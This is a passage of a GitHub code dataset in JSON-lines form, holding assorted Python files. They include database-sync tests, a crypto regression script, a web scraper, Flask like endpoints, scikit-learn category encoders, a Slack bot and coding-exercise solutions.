1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n assert_equals(\n [],\n select_applicable_changes(migrations, schema_version=3, target_version=3))\n\n\nclass _TestWithDatabase(unittest.TestCase):\n\n def setUp(self):\n self.db = 'sqlite3 -bail tests/test.db'\n\n def tearDown(self):\n if os.path.exists('tests/test.db'): os.remove('tests/test.db')\n\n\nclass ExecuteDatabaseCommand(_TestWithDatabase):\n\n def setUp(self):\n super(ExecuteDatabaseCommand, self).setUp()\n p = Popen(self.db, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)\n p.communicate('''\n CREATE TABLE schema_version (version INTEGER NOT NULL);\n INSERT INTO schema_version VALUES (20130307005200);\n ''')\n\n def test_executes_command(self):\n result = execute_db_command(self.db, 'SELECT version FROM schema_version;')\n assert_equals('20130307005200\\n', result)\n\n @raises(DbSyncError)\n def test_raises_error_when_command_cannot_be_executed(self):\n execute_db_command(self.db, 'FUCKED')\n\n\n# Pending\n# class ExecuteChange(_TestWithDatabase):\n\n# def 
test_executes_change_sql_and_updates_schema_version(self):\n# execute_change(self.db, (20130307005200, 'CREATE TABLE foo (id INTEGER NOT NULL);'))\n# execute_db_command(self.db, 'SELECT id FROM foo;')\n","repo_name":"mzb/dbsync","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"17522861115","text":"\n# Import Libraries\nimport numpy as np\nimport matplotlib.pylab as pyplot\nimport pandas as pd\n\nfrom main.python.MachineLearning.TimeSeriesForecasting.DataCollection import collectAndWriteToCsv\n\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\n# Setup\nmarket_name = \"ETH-LTC\"\ntrade_period = \"day\"\nfile_name = \"MarketData.csv\"\nwindow_size = 10\nprint(\"Recent closing prices for {} exchange\".format(market_name))\ncollectAndWriteToCsv(market_name, trade_period, file_name)\n\n\n# Import the dataset\nseries = pd.read_csv(file_name)\nx_data = series.index.values.reshape(-1, 1)\ny_data = series[\"ClosingPrice\"].values\n\n\n# Splitting the data into the Training and Test sets\nnum_splits = 2\nsplits = TimeSeriesSplit(n_splits=num_splits)\n\nindex = 1\nfor train_index, test_index in splits.split(x_data):\n x_train, x_test = x_data[train_index], x_data[test_index]\n y_train, y_test = y_data[train_index], y_data[test_index]\n\n # Fitting the Linear Regressor\n linear_regressor = LinearRegression()\n linear_regressor.fit(x_train, y_train)\n\n # Fitting the Polynomial Regressor\n linear_regressor_2 = LinearRegression()\n poly_regressor = PolynomialFeatures(degree=10)\n x_poly = poly_regressor.fit_transform(x_train)\n poly_regressor.fit(x_poly, y_train)\n linear_regressor_2.fit(x_poly, y_train)\n\n pyplot.figure(index)\n pyplot.subplot(411)\n pyplot.plot(x_train, y_train, color=\"red\", label=\"Original\")\n pyplot.plot(x_train, linear_regressor.predict(x_train), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Training data linear regression index - {}\".format(index))\n\n pyplot.figure(index)\n pyplot.subplot(412)\n pyplot.plot(x_test, y_test, color=\"red\", label=\"Original\")\n pyplot.plot(x_test, linear_regressor.predict(x_test), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Test data linear regression index - {}\".format(index))\n\n pyplot.figure(index)\n pyplot.subplot(413)\n pyplot.plot(x_train, y_train, color=\"red\", label=\"Original\")\n pyplot.plot(x_train, linear_regressor_2.predict(poly_regressor.fit_transform(x_train)), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Training data poly regression index - {}\".format(index))\n\n pyplot.figure(index)\n pyplot.subplot(414)\n pyplot.plot(x_test, y_test, color=\"red\", label=\"Original\")\n pyplot.plot(x_test, linear_regressor_2.predict(poly_regressor.fit_transform(x_test)), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Test data poly regression index - {}\".format(index))\n\n index += 1\n\npyplot.show()","repo_name":"sadothcoder/PythonCryptoTrader","sub_path":"main/python/MachineLearning/TimeSeriesForecasting/Udemy/PolynomialRegression.py","file_name":"PolynomialRegression.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} 
+{"seq_id":"36516520718","text":"import requests\r\nfrom fake_useragent import UserAgent\r\nfrom lxml import etree\r\n\r\nurl = 'http://www.farmer.com.cn/xwpd/rdjj1/201807/t20180726_1393916.htm'\r\nheaders = {\r\n \"User-Agent\": UserAgent().random\r\n}\r\n\r\nresponse = requests.get(url, headers=headers)\r\ne = etree.HTML(response.text) # xpath解析\r\n\r\ntitle = e.xpath('//h1/text()') # 文章标题\r\n\r\ncontent = e.xpath('//div[@class=\"content\"]//p') # 文章内容\r\n# content优化格式\r\ncontent_list = []\r\nfor c in content:\r\n info = c.xpath('string(.)') # 格式化当前节点\r\n content_list.append(info)\r\ncontent_str = ''.join(content_list) # 字符串化\r\n\r\nimg_urls = e.xpath('//div[@class=\"content\"]//img/@src') # 图片链接\r\n\r\nimg_names = e.xpath('//div[@align=\"center\"]') # 图片标题\r\nfor num in range(1, len(img_names), 2):\r\n img_name = img_names[num].xpath('string(.)')\r\n","repo_name":"Wangzg97/crawler_learning","sub_path":"31-练习-图文抓取.py","file_name":"31-练习-图文抓取.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"11327083815","text":"\nprint(\"App`i dayandirmaq ucun : exit yazin\")\nwhile True:\n con=open('Python_Tasks/File/python.txt','a')\n a= input(\"Melumat elave edin:\")\n if a==\"exit\":\n break\n con.close()\n else:\n con.write(a)\n con.write(\"\\n\")\n con.close()\n","repo_name":"feritkerimli/PragmatechFoundationProject","sub_path":"Python_Tasks/File/writefile.py","file_name":"writefile.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"} +{"seq_id":"23774380863","text":"\"\"\"\njustwindow.py:\n window を表示するスクリプト\n 色を変えたりイベントを学ぶ\n\"\"\"\n# window を表示する\nimport sys\nimport pygame\nfrom pygame.locals import QUIT\n\n# pygame モジュールの初期化\npygame.init()\n\n# 400*300サイズのウィンドウを作成して定数SURFACEに格納\nSURFACE = pygame.display.set_mode((400, 300))\n# 実行時間の調整\nFPSCLOCK = pygame.time.Clock()\n\ndef main():\n \"\"\" main routine \"\"\"\n\n while True:\n\n # \"event\"とはマウスを動かしたりクリックしたりの動作\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n # 画面をオレンジ色で塗りつぶす\n SURFACE.fill((255, 150, 0))\n\n # 格子を作る\n # 黒:縦線\n for x_position in range(0,400,25):\n pygame.draw.line(SURFACE, (0,0,0),\n (x_position, 0), (x_position, 300))\n # 黒:横線\n for y_position in range(0,300,25):\n pygame.draw.line(SURFACE, (0,0,0),\n (0, y_position), (400, y_position))\n\n pygame.display.update()\n FPSCLOCK.tick(3)\n\n \nif __name__ == '__main__':\n main()","repo_name":"sayaka71/Python","sub_path":"Pygame/draw_line1.py","file_name":"draw_line1.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"321785332","text":"from src.engine.configurations import EngineConfigurations\nfrom src.engine.cnn import ConvolutionalNeuralNetwork\nfrom src.engine.fcn import FullyConvolutionalNetwork\nfrom src.engine.gan import GenerativeAdversairalNetwork\nfrom src.engine.bbd import BoundingBoxDetector\n\n\nclass Dlae(object):\n def __init__(self, configs):\n self.configs = configs\n self.engine_configs = EngineConfigurations(self.configs)\n self.model = None\n self.errors = []\n self.get_model()\n\n def get_model(self):\n if self.engine_configs.dispatcher.model_signal == \"CNN\":\n self.model = ConvolutionalNeuralNetwork(self.engine_configs)\n\n elif self.engine_configs.dispatcher.model_signal == \"FCN\":\n self.model = 
FullyConvolutionalNetwork(self.engine_configs)\n\n elif self.engine_configs.dispatcher.model_signal == \"GAN\":\n self.model = GenerativeAdversairalNetwork(self.engine_configs)\n\n elif self.engine_configs.dispatcher.model_signal == \"BBD\":\n self.model = BoundingBoxDetector(self.engine_configs)\n\n def run(self):\n if self.engine_configs.dispatcher.type_signal == \"Train\":\n self.model.construct_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n else:\n self.model.compile_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n else:\n self.model.train_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n\n elif self.engine_configs.dispatcher.type_signal == \"Train from Checkpoint\":\n self.model.retrain_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n\n elif self.engine_configs.dispatcher.type_signal == \"Inference\":\n self.model.predict_on_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n","repo_name":"jeremiahws/dlae","sub_path":"src/engine/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"} +{"seq_id":"11542894282","text":"\"\"\"\nbehavior for factory\n--------------------\n\n >>> from memphis import config, content\n >>> config.begin(packages=('memphis.content.meta',))\n\n >>> from zope import interface\n >>> from zope.component import getSiteManager\n >>> class Ob(object):\n ... def __init__(self, iface):\n ... interface.directlyProvides(self, iface)\n\n >>> class ITest(interface.Interface):\n ... pass\n\n >>> class TestFactory(content.BehaviorFactoryBase):\n ... content.behavior('test', ITest)\n\n >>> class TestFactory2(content.BehaviorFactoryBase):\n ... pass\n ...\n >>> reGrok()\n\n >>> sm = getSiteManager()\n >>> print content.queryBehavior(ITest)\n None\n\n >>> config.commit()\n\n >>> bh = content.getBehavior(ITest)\n >>> isinstance(bh.factory, TestFactory)\n True\n\n >>> config.begin()\n >>> class TestFactory3(content.BehaviorFactoryBase):\n ... 
content.behavior('test', ITest)\n\n    >>> reGrok()\n    >>> config.commit()\n    Traceback (most recent call last):\n    ...\n    ConfigurationConflictError: Conflicting configuration actions\n    ...\n\n\"\"\"\nimport martian, sys\nfrom zope import interface\nfrom zope.interface.interface import InterfaceClass\n\nfrom memphis import config\nfrom memphis.content import registry, interfaces\nfrom memphis.content.directives import schema, behavior\nfrom memphis.content.registry import BehaviorBase, BehaviorFactoryBase\n\n\nclass SchemaGrokker(martian.InstanceGrokker):\n    martian.component(InterfaceClass)\n    martian.directive(schema)\n\n    def grok(self, name, interface, configContext=config.UNSET, **kw):\n        if interface in schemaExecuted and \\\n           not getattr(interface.__module__, '__fake_module__', False):\n            return False\n        schemaExecuted.append(interface)\n\n        value = schema.bind(default=_marker).get(interface)\n        if value is _marker:\n            return False\n\n        name, klass, type, t, d, info = value\n\n        config.addAction(\n            configContext,\n            discriminator = ('memphis.content:schema', name),\n            callable = registry.registerSchema,\n            args = (name, interface, klass, type, t, d),\n            order = (config.moduleNum(interface.__module__), 90),\n            info = info)\n        return True\n\n\nclass BehaviorGrokker(martian.ClassGrokker):\n    martian.component(BehaviorBase)\n    martian.directive(behavior)\n\n    def execute(self, klass, configContext=None, **kw):\n        value = behavior.bind(default=_marker).get(klass)\n        if value is _marker:\n            return False\n\n        name, iface, schema, type, t, d, info = value\n\n        if iface is None:\n            provides = list(interface.implementedBy(klass))\n            if len(provides) == 1:\n                iface = provides[0]\n            else:\n                raise TypeError(\"Missing 'spec' attribute\")\n\n        config.addAction(\n            configContext,\n            discriminator = ('memphis.content:behavior', name),\n            callable=registry.registerBehavior,\n            args = (name, iface, klass, schema, type, t, d),\n            order = (config.moduleNum(klass.__module__), 91),\n            info = info)\n\n        return True\n\n\nclass BehaviorFactoryGrokker(martian.ClassGrokker):\n    martian.component(BehaviorFactoryBase)\n    martian.directive(behavior)\n\n    def execute(self, factory, configContext=None, **kw):\n        value = behavior.bind(default=_marker).get(factory)\n        if value is _marker:\n            return False\n\n        name, iface, schema, type, t, d, info = value\n\n        config.addAction(\n            configContext,\n            discriminator = ('memphis.content:behavior', name),\n            callable=registry.registerBehavior,\n            args = (name, iface, factory(), schema, type, t, d),\n            order = (config.moduleNum(factory.__module__), 91),\n            info = info)\n\n        return True\n\n\n_marker = object()\n\nschemaExecuted = []\n\n@config.cleanup\ndef cleanUp():\n    global schemaExecuted\n    schemaExecuted[:] = []\n","repo_name":"fafhrd91/memphis-dev","sub_path":"plone/memphis.content/memphis/content/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"3924109668","text":"# 文中のすべての名詞を含む文節に対し,その文節から構文木の根に至るパスを抽出せよ.\n# ただし,構文木上のパスは以下の仕様を満たすものとする.\n# 各文節は(表層形の)形態素列で表現する\n# パスの開始文節から終了文節に至るまで,各文節の表現を\"->\"で連結する\nimport re\n\nclass Morph:\n    def __init__(self,surface,bace,pos,pos1):\n        self.surface = surface\n        self.bace = bace\n        self.pos = pos\n        self.pos1 = pos1\n    # それぞれの要素を返すメソッド(関数)\n    def __str__(self):\n        return \"surface[{}] bace[{}] pos[{}] pos1[{}]\".format(self.surface,self.bace,self.pos,self.pos1)\n\nclass Chunk:\n    def __init__(self):\n        self.morphs = []\n        self.dst = None\n        self.srcs = None\n\n    def 
__str__(self):\n surface = \"\"\n for morph in self.morphs:\n surface += morph.surface\n return \"{} dst[{}] srcs[{}]\".format(surface,self.dst,self.srcs)\n\n def sentence_surface(self):\n surface = \"\"\n for morph in self.morphs:\n if morph.pos != \"記号\":\n surface += morph.surface\n return surface\n\n def sentence_pos(self,pos):\n for morph in self.morphs:\n if morph.pos == pos:\n return True\n return False\n\ndef chunk_list():\n ans = []\n mid = []\n chunk = Chunk()\n\n with open(\"neko.txt.cabocha\") as data:\n lines = data.readlines()\n for line in lines:\n if line[:3] == \"EOS\":\n \n if len(chunk.morphs) > 0:\n mid.append(chunk)\n chunk = Chunk()\n \n if len(mid) > 0:\n ans.append(mid)\n mid = []\n else:\n if line[0] == \"*\":\n if len(chunk.morphs) > 0:\n mid.append(chunk)\n chunk = Chunk()\n parts = line.split(\" \")\n parts[2] = int(re.sub(\"D\",\"\",parts[2]))\n chunk.dst = parts[2]\n chunk.srcs = parts[1]\n else:\n words = line.split(\"\\t\")\n parts = words[1].split(\",\")\n morph = Morph(words[0],parts[6],parts[0],parts[1])\n chunk.morphs.append(morph)\n return ans\n\nif __name__ == \"__main__\":\n answers = chunk_list()\n for chunks in answers:\n for chunk in chunks:\n if chunk.sentence_pos(\"名詞\"):\n word = chunk\n while word.dst != -1:\n src = word.sentence_surface()\n word = chunks[word.dst]\n if src != \"\":\n print(f\"{src}->\",end = \"\")\n end = word.sentence_surface()\n if end != chunk.sentence_surface():\n print(end)\n","repo_name":"a1da4/NLP_100-knocks_2015","sub_path":"chap5/48_100.py","file_name":"48_100.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"36572443127","text":"\nimport json\nimport requests\nfrom settings import *\nfrom _secret import *\n\nHOOK_URL = INCOMING_HOOK_URL\n\nclass Bot(object):\n \"\"\"An abstract bot API wrapper for slack.\n \"\"\"\n def __init__(self, channel=DEFAULT_CHANNEL, username=DEFAULT_USERNAME, emoji=':ai:'):\n self.payload = {'channel': channel, 'username': username, 'emoji': emoji}\n\n def send(self, *texts, **kwargs):\n \"\"\"Sends a message via incoming hook in `print` semantic of python.\"\"\"\n payload = self.payload.copy()\n if 'channel' in kwargs:\n payload['channel'] = kwargs['channel']\n if 'username' in kwargs:\n payload['username'] = kwargs['username']\n payload['text'] = ' '.join(map(unicode, texts))\n return requests.post(HOOK_URL, data={'payload': json.dumps(payload)})\n\n","repo_name":"youknowone/ingress-slack","sub_path":"botkit.py","file_name":"botkit.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"8"} +{"seq_id":"11479165489","text":"from flask import Response\nfrom flask_restful import Resource\nfrom models import LikePost, db, Post\nimport json\nfrom . 
import can_view_post, get_authorized_user_ids\nimport flask_jwt_extended\n\nclass PostLikesListEndpoint(Resource):\n\n @flask_jwt_extended.jwt_required()\n def __init__(self, current_user):\n self.current_user = current_user\n \n @flask_jwt_extended.jwt_required()\n def post(self, post_id):\n # Your code here\n try:\n user_id = self.current_user.id # id of the user who is logged in\n \n # create post:\n\n post = Post.query.get(post_id)\n if not post:\n return Response(json.dumps({'message': 'Invalid post ID'}), mimetype=\"application/json\", status=404)\n\n ids_for_me_and_my_friends = get_authorized_user_ids(self.current_user)\n if can_view_post(post_id, self.current_user):\n\n newLike = LikePost(user_id, post_id)\n \n try:\n db.session.add(newLike)\n db.session.commit()\n return Response(json.dumps(newLike.to_dict()), mimetype=\"application/json\", status=201)\n\n\n except:\n return Response(json.dumps({'message': 'Like already exists'}), mimetype=\"application/json\", status=400)\n else:\n return Response(json.dumps({'message': 'You do not have access to this post'}), mimetype=\"application/json\", status=404)\n \n \n except Exception as e:\n print(\"error in post likes\", e)\n return Response(json.dumps({'message': 'Invalid query'}), mimetype=\"application/json\", status=400)\n \n \n\nclass PostLikesDetailEndpoint(Resource):\n\n @flask_jwt_extended.jwt_required()\n def __init__(self, current_user):\n self.current_user = current_user\n \n @flask_jwt_extended.jwt_required()\n def delete(self, post_id, id):\n\n try:\n comment = LikePost.query.get(id)\n\n if not comment:\n return Response(json.dumps({'message': 'Error comment with that ID does not exist'}), mimetype=\"application/json\", status=404)\n \n if comment.user_id != self.current_user.id:\n return Response(json.dumps({'message': 'Error you do not have access to this'}), mimetype=\"application/json\", status=404)\n \n if comment:\n \n LikePost.query.filter_by(id=id).delete()\n db.session.commit()\n serialized_data = {\n 'message': 'Like {0} successfully deleted.'.format(id)\n }\n return Response(json.dumps(serialized_data), mimetype=\"application/json\", status=200)\n\n else:\n return Response(json.dumps({'message': 'Error comment with that ID does not exist'}), mimetype=\"application/json\", status=404)\n\n except:\n return Response(json.dumps({'message': 'Invalid query'}), mimetype=\"application/json\", status=400)\n \n # Your code here\n \n\n\n\ndef initialize_routes(api):\n api.add_resource(\n PostLikesListEndpoint, \n '/api/posts//likes', \n '/api/posts//likes/', \n resource_class_kwargs={'current_user': flask_jwt_extended.current_user}\n )\n\n api.add_resource(\n PostLikesDetailEndpoint, \n '/api/posts//likes/', \n '/api/posts//likes//',\n resource_class_kwargs={'current_user': flask_jwt_extended.current_user}\n )\n","repo_name":"notfingees/photo-app-2","sub_path":"views/post_likes.py","file_name":"post_likes.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"10506512597","text":"\"\"\"Median price null\n\nRevision ID: 9b4286219299\nRevises: 1a59ce76e17d\nCreate Date: 2022-02-17 14:44:52.887249\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9b4286219299'\ndown_revision = '1a59ce76e17d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column('dota_item_history', 'median_price',\n existing_type=sa.NUMERIC(precision=10, scale=2),\n nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('dota_item_history', 'median_price',\n existing_type=sa.NUMERIC(precision=10, scale=2),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"NeKadgar/game_market_steam_eye","sub_path":"alembic/versions/9b4286219299_median_price_null.py","file_name":"9b4286219299_median_price_null.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"22510489736","text":"# Importing Dependencies\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn import set_config\n\nimport pandas as pd\nimport numpy as np\nimport warnings\n\n# Ignoring potential warnings\nwarnings.filterwarnings(action = \"ignore\")\n\n# Visualizing the pipeline\nset_config(display = \"diagram\")\n\n# Defining a global level seed\nnp.random.seed(seed = 42)\n\n# Creating a custom FrequencyRatioEncoder class\nclass FrequencyRatioEncoder(BaseEstimator, TransformerMixin):\n # Initializing the objects\n def __init__(self, use_arbitrary_frequency_ratio = False, unknown_value_frequency_ratio = None):\n self.use_arbitrary_frequency_ratio = use_arbitrary_frequency_ratio\n self.unknown_value_frequency_ratio = unknown_value_frequency_ratio\n \n # Defining the fit function\n def fit(self, X, y = None):\n # Creating an empty list to store frequency ratios\n frequencies = []\n \n # Creating a copy of a data frame\n data_frame = X.copy()\n \n # Creating a list of columns\n columns = data_frame.columns.tolist()\n \n # Looping through each column\n for i in columns:\n # Calculating the frequency ratio of each unique value of a variable\n frequency_dict = data_frame[i].value_counts(normalize = True).to_dict()\n \n # Appending the dictionary to the list\n frequencies.append(frequency_dict)\n \n # Redefining the objects\n self.frequencies = frequencies\n self.columns = columns\n \n # Returning the objects\n return self\n \n # Defining the transform function\n def transform(self, X, y = None):\n # Creating a copy of a data frame\n data_frame = X.copy()\n \n # Reseting the index\n data_frame.reset_index(drop = True, inplace = True)\n \n # Looping through each column\n for index, column in enumerate(iterable = self.columns):\n # Replacing the unique values with a frequency ratio\n data_frame[column] = data_frame[column].apply(func = lambda x: self.frequencies[index].get(x))\n \n # Creating a condition based on unseen value in a dataset\n if data_frame[column].isna().sum() > 0:\n # Creating a condition based on arbitrary frequency ratio\n if not self.use_arbitrary_frequency_ratio:\n # Calculating the penalized frequency ratio\n frequency_ratio = min(list(self.frequencies[index].values())) / 2\n \n # Replacing the unseen value with the penalized frequency ratio\n data_frame.loc[data_frame[column].isna(), column] = frequency_ratio\n else:\n # Replacing the unseen value with the unknown value frequency ratio\n data_frame.loc[data_frame[column].isna(), column] = self.unknown_value_frequency_ratio\n else:\n # Passing in case the condition is not satisfied\n pass\n \n # Asserting the number of mising values to be equal to zero\n assert data_frame[column].isna().sum() == 0\n \n # Returning the data frame\n return data_frame\n\n# Defining a custom class to encode rare 
categories\nclass RareLabelEncoder(BaseEstimator, TransformerMixin):\n # Defining the instance attributes\n def __init__(self, tol = 0.1, n_categories = 10, new_category = \"Other\", unseen_category = \"Unseen Category\"):\n self.tol = tol\n self.n_categories = n_categories\n self.new_category = new_category\n self.unseen_category = unseen_category\n\n # Defining the fit function\n def fit(self, X, y = None):\n # Creating a copy of a data frame\n data_frame = X.copy()\n\n # Creating a list of columns\n columns = data_frame.columns.tolist()\n\n # Creating a list of features with high cardinality\n high_cardinality_features = [i for i in columns if data_frame[i].nunique() >= self.n_categories]\n\n # Creating a list of value frequency for each feature\n category_frequencies = [data_frame[i].value_counts(normalize = True) for i in high_cardinality_features]\n\n # Creating a list of rare categories for each feature\n rare_categories = [i.loc[i < self.tol].index.tolist() for i in category_frequencies]\n\n # Looping through each loop\n for index, column in enumerate(iterable = high_cardinality_features):\n # Mapping the rare categories\n data_frame.loc[data_frame[column].isin(values = rare_categories[index]), column] = f\"{self.new_category}_{column}\"\n\n # Creating a list of unique categories\n unique_categories_train = [data_frame[i].unique().tolist() for i in high_cardinality_features]\n\n # Redefining the instance attributes\n self.high_cardinality_features = high_cardinality_features\n self.unique_categories_train = unique_categories_train\n self.rare_categories = rare_categories\n\n # Returning the objects\n return self\n\n # Defining the fit function\n def transform(self, X, y = None):\n # Creating a copy of a data frame\n data_frame = X.copy()\n\n # Looping through each loop\n for index, column in enumerate(iterable = self.high_cardinality_features):\n # Creating a list of rare categories\n rare_categories = self.rare_categories[index]\n\n # Creating a list of unique values of a train set\n unique_categories_train = self.unique_categories_train[index]\n\n # Mapping the rare categories\n data_frame.loc[data_frame[column].isin(values = rare_categories), column] = f\"{self.new_category}_{column}\"\n\n # Creating a list of unique values of a test set\n unique_categories_test = data_frame[column].unique().tolist()\n\n # Identifying the potential unseen categories\n unseen_categories = [i for i in unique_categories_test if i not in unique_categories_train]\n\n # Creating a condition based on the number of unseen categories\n if len(unseen_categories) > 0:\n # Mapping the unseen categories\n data_frame.loc[data_frame[column].isin(values = unseen_categories), column] = self.unseen_category\n else:\n # Passing in case the condition is not satisfied\n pass\n\n # Returning the data frame\n return data_frame","repo_name":"Theynalzada/turbo_car","sub_path":"Notebooks/turbo_category_encoders.py","file_name":"turbo_category_encoders.py","file_ext":"py","file_size_in_byte":6547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"2701496428","text":"def solution(phone_book):\n phone_book = sorted(phone_book, key=lambda x: (len(x), int(x)), reverse=False)\n print(phone_book)\n for i in range(len(phone_book)):\n print('\\n{}가 접두어로 포함된 번호가 있는지 확인합니다.'.format(phone_book[i]))\n for j in range(i+1, len(phone_book)):\n print(phone_book[j])\n if len(phone_book[i]) == len(phone_book[j]):\n pass\n else:\n if len(phone_book[i]) < len(phone_book[j]):\n 
print('{}에 {}가 접두어로 있는지 확인합니다.'.format(phone_book[j], phone_book[i]))\n if phone_book[i] == phone_book[j][:len(phone_book[i])]:\n print('{}에 {}가 있습니다.'.format(phone_book[j], phone_book[i]))\n return False\n return True\n\nprint(solution([\"119\", \"97674223\", \"1195524421\"]))\nprint(solution([\"123\",\"456\",\"789\"]))\nprint(solution([\"12\",\"123\",\"1235\",\"567\",\"88\",'11']))\n\ndef solution2(phone_book):\n len_pb = list(set([len(element) for element in phone_book]))\n len_pb.sort(reverse=False)\n # phone_book 리스트의 원소들의 길이들을 중복을 제거하여 오름차순으로 나열한다.\n print(len_pb)\n if len(len_pb) == 1:\n return True\n # 만약 len_pb의 길이가 1이라면 phone_book 리스트가 길이가 같은 문자열들로만 이루어졌다는 의미이므로\n # 접두어를 포함하는 번호는 존재할 수 없다.\n else:\n for num in len_pb:\n temp = set([ele[:num] for ele in phone_book if len(ele) > num])\n # phone_book의 원소들 중에서 길이가 num 이상인 원소들을 num 인덱스 이전까지 추출하여 set 자료형으로 변환한다.\n pb = set([ele for ele in phone_book if len(ele) == num])\n # phone_book의 원소들 중 길이가 num인 원소들을 포함한 set 자료형 pb를 만든다.\n if temp & pb:\n # 만약 pb와 temp의 교집합이 공집합이 아니라면 접두어를 포함한 번호가 있다는 의미가 된다.\n return False\n return True\n\nprint()\nprint(solution2([\"119\", \"97674223\", \"1195524421\"]))\nprint(solution2([\"123\",\"456\",\"789\"]))\nprint(solution2([\"10\",\"123\",\"1235\",\"567\",\"88\",'11']))\n\n# 다른사람 풀이\n\ndef solution(phoneBook):\n phoneBook = sorted(phoneBook)\n\n for p1, p2 in zip(phoneBook, phoneBook[1:]):\n if p2.startswith(p1):\n return False\n return True","repo_name":"jinyoong/programers","sub_path":"level2/잔화번호 목록.py","file_name":"잔화번호 목록.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"4646983009","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 15 13:40:40 2021\n\n@author: John Meluso\n\"\"\"\n\nimport get_data as gd\nimport get_params as gp\nimport math\nimport statistics\nimport numpy as np\nimport scipy.stats\nimport pandas as pd\n\ndef import_execset(execset=1):\n \"\"\"Imports data from a specified execution set and returns a dataframe\n sorted by case number and run number.\"\"\"\n\n # Specify dataframe inputs\n names = ['index_case',\n 'index_run',\n 'x_num_nodes',\n 'x_objective_fn',\n 'x_num_edges',\n 'x_prob_triangle',\n 'x_conv_threshold',\n 'x_max_cycles',\n 'x_init_temp',\n 'x_anneal_iter',\n 'x_est_method',\n 'x_est_prob',\n 'x_anneal_coolrate',\n 'y_num_cycles',\n 'y_sys_perf']\n types = {'index_case': np.int32,\n 'index_run': np.int32,\n 'x_num_nodes': np.int32,\n 'x_objective_fn': 'category',\n 'x_num_edges': np.int32,\n 'x_prob_triangle': np.float64,\n 'x_conv_threshold': np.float64,\n 'x_max_cycles': np.int32,\n 'x_init_temp': np.float64,\n 'x_anneal_iter': np.int32,\n 'x_est_method': 'category',\n 'x_est_prob': np.float64,\n 'x_anneal_coolrate': np.float64,\n 'y_num_cycles': np.int32,\n 'y_sys_perf': np.float64}\n\n # Read from CSV file\n df = pd.read_csv(f'../data/sets/execset{execset:03}_summary.csv',\n names=names, dtype=types)\n\n # Sort the new dataframe by case and run\n df.sort_values(by=['index_case','index_run'],axis=0, inplace=True)\n df.reset_index(drop=True,inplace=True)\n\n # Return the dataframe\n return df\n\n\ndef import_params(exec_list=[1,2,3,4],run_list=np.arange(100)):\n\n params_all = []\n\n # Iterate through executions\n for execnum in exec_list:\n\n # Get parameters for each execution number\n params_subset = gp.get_params(execnum)\n\n for ps in params_subset:\n params_all.append(ps.copy())\n\n return params_all\n\n\nif __name__ == '__main__':\n\n # Import 
